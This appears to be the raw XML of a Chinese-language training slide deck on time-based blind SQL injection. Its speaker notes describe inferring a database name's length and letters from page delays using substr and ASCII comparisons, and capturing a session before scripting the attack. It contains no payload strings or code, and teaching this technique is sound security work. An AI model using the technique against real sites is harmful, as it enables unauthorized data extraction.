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546" r:id="rId2"/>
    <p:sldId id="336" r:id="rId3"/>
    <p:sldId id="547" r:id="rId4"/>
    <p:sldId id="548" r:id="rId5"/>
    <p:sldId id="549" r:id="rId6"/>
    <p:sldId id="550" r:id="rId7"/>
    <p:sldId id="551" r:id="rId8"/>
    <p:sldId id="552" r:id="rId9"/>
    <p:sldId id="553" r:id="rId10"/>
    <p:sldId id="554" r:id="rId11"/>
    <p:sldId id="555" r:id="rId12"/>
    <p:sldId id="556" r:id="rId13"/>
    <p:sldId id="557" r:id="rId14"/>
    <p:sldId id="558" r:id="rId15"/>
    <p:sldId id="559" r:id="rId16"/>
    <p:sldId id="560" r:id="rId17"/>
    <p:sldId id="517" r:id="rId18"/>
    <p:sldId id="561" r:id="rId19"/>
    <p:sldId id="518" r:id="rId20"/>
    <p:sldId id="519" r:id="rId21"/>
    <p:sldId id="562" r:id="rId22"/>
    <p:sldId id="563" r:id="rId23"/>
    <p:sldId id="564" r:id="rId24"/>
    <p:sldId id="522" r:id="rId25"/>
    <p:sldId id="565" r:id="rId26"/>
    <p:sldId id="566" r:id="rId27"/>
    <p:sldId id="567" r:id="rId28"/>
    <p:sldId id="568" r:id="rId29"/>
    <p:sldId id="569" r:id="rId30"/>
    <p:sldId id="570" r:id="rId31"/>
    <p:sldId id="571" r:id="rId32"/>
    <p:sldId id="572" r:id="rId33"/>
    <p:sldId id="573" r:id="rId34"/>
    <p:sldId id="574" r:id="rId35"/>
    <p:sldId id="575" r:id="rId36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4999"/>
    <a:srgbClr val="FCFDFA"/>
    <a:srgbClr val="FBFEFB"/>
    <a:srgbClr val="173A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21"/>
    <p:restoredTop sz="86306" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="69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4" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="296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52D740F-22AD-4849-8472-F50191CC9BD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CA0838-00B4-0646-A6E5-797A7C76DF44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9432230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BCC81F-04A9-4342-96CD-CB9700F6E910}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16</a:t>
            </a:fld>
            <a:endParaRPr lang="x-non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x-non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BED20C-72F8-6347-A583-F969C4DCD7E4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751643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3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580022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zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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12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3732688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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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13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5140418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14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5523474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选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 如上所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BUG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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15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6117518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16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4293893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aseline="0" dirty="0"/>
              <a:t>在之前的注入我们知道有这么一个电影。，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>F12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>控制台可以看到时间长度，的确是一个注入点，开始构造语句获取进一步信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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17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327642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当长度为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4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时，无延时，当长度为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5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时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 延时。说明数据库名字长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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18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7058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我们很难猜测到一个完整的长度为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5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数据库名字叫什么。但是我们可以尝试第一个字母是什么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,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从 字母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a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开始，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的时候，可以看见，页面延迟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>秒。而为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>时不延迟。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="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altLang="zh-CN" baseline="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zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>确定了第一个字母后，通过修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="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zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的参数值 就获取第二个字母。以此类推推，直到获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>个字母。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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19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389431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尝试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5-23.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最后发现版本名称总长度为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23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20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8998911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我们将输出进行编码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ascii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码，很明显为后续的程序编写提供了方向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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21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812490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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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4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085805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可以看到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98 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为 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b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22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9508734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截取登录时候的信息，输入四个数据，我们在脚本执行前，要先获取登录的状态，否则在脚本执行过程中会跳转到登录页面，这里的登录状态存在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session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中的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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23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4976056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这里仅演示获取数据库名称的方案，如果想要获取其他信息，对应修改红色框的内容。左下角红色方框为具体数据名字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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24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7884385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这里仅演示获取数据库名称的方案，如果想要获取其他信息，对应修改红色框的内容。左下角红色方框为具体数据名字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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25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0878174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26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151973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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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27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72995595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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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28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21745458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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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29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6830259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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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30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24903264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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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31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873079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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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5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62164620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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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32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8032719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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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33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9113711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34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222262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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
